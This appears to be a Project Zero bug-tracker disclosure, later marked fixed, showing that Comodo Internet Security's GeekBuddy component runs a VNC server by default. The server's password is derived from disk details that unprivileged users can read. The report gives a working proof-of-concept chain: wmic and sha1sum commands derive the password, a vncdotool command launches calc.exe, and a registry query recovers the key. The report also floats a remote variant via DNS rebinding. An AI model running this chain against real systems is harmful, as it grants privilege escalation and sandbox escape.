New issue
Advanced search Search tips

Issue 703 link

Starred by 7 users

Issue metadata

Status: Fixed
Closed: Feb 2016

Sign in to add a comment

Comodo: Comodo Internet Security installs and starts a VNC server by default

Project Member Reported by, Jan 20 2016

Issue description

When you install Comodo Internet Security, in the default configuration an application called "GeekBuddy" is also installed and added to HKLM\System\CurrentControlSet\Services. GeekBuddy is a tech support application, that uses a number of questionable and shady tactics to encourage users to pay for online tech support.

As has been noted by numerous people over the last few years, GeekBuddy also installs a VNC server and enables it by default.


This is an obvious and ridiculous local privilege escalation, which apparently Comodo believe they have resolved by generating a password instead of leaving it blank. That is not the case, as the password is simply the first 8 characters of SHA1(Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks). I imagine Comodo thought nobody would bother checking how they generated the password, because this clearly doesn't prevent the attack they claim it solved.

Not to mention that this is also a sandbox escape that even works against Comodo and Chromodo sandboxes, not to mention Chrome, Protected Mode, and other sandboxes.

This information is available to unprivileged users, for example, an unprivileged user can launch calc.exe like this:

$ wmic diskdrive get Caption,Signature,SerialNumber,TotalTracks
Caption                                    SerialNumber  Signature   TotalTracks
VMware, VMware Virtual S SCSI Disk Device                -135723213  1997160

$ printf VMware,VMwareVirtualSSCSIDiskDevice-13572321319971601997160 | sha1sum | cut -c-8

$ printf "key ctrl-esc\ntype calc.exe\nkey enter\n" | vncdotool -p 7d4612e5 -s localhost::5901 -

I'm using vncdotool from here:

(Note: if there is no SerialNumber field, TotalTracks needs to be repeated twice, I think this is a bug)

Or alternatively you can pull the password out of HKLM, just truncate it to 8 characters(!!!):

$ reg query HKLM\\System\\Software\\COMODO\\CLPS\ 4\\CA /v osInstanceId
    osInstanceId    REG_SZ    7d4612e59b27e4f19fc3d8e3491fb3bb879b18f3

Screenshot attached for reference.

It feels like there might be a way to make this remote, perhaps via dns-rebinding and websockets.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Windows 7-2016-01-19-15-59-11.png
476 KB View Download
Project Member

Comment 1 by, Feb 18 2016

Labels: -Restrict-View-Commit
Status: Fixed
Update today:

Hello Tavis,

Regarding the vulnerability below, we have issued a hotfix on 10th of February. 

GB  4.25.380415.167 has the required fix and 90+% of existing users are updated as of now.

Wow, so that's what you meant on Twitter.

That's shady and horribly disappointing. If there was ever a reason to uninstall Comodo, this was it.

Thanks for everything you and Project Zero does. :)
comment from Comodo
Wow have you read the spin Comodo put on this? "ITS NOT REMOTELY EXPLOITABLE" they claim, completely dismissing responsibility for what is a serious privilege escalation vulnerability.

Comment 5 Deleted

This transcends a simple bug and vulnerability, it is a backdoor.
@tobias, indeed, it's also written after the fact, as though the current state is how it was before. 

You can't issue a patch, then claim there wasn't a problem by describing how the software works post-patch.
Labels: -Vendor-Comodo -Product-Comodo Vendor-comodo Product-comodo
Thanks for your greeting. i have see your profile blog, i very like with your page. but i need much more about your article smile
because your article is so so nice.

Sign in to add a comment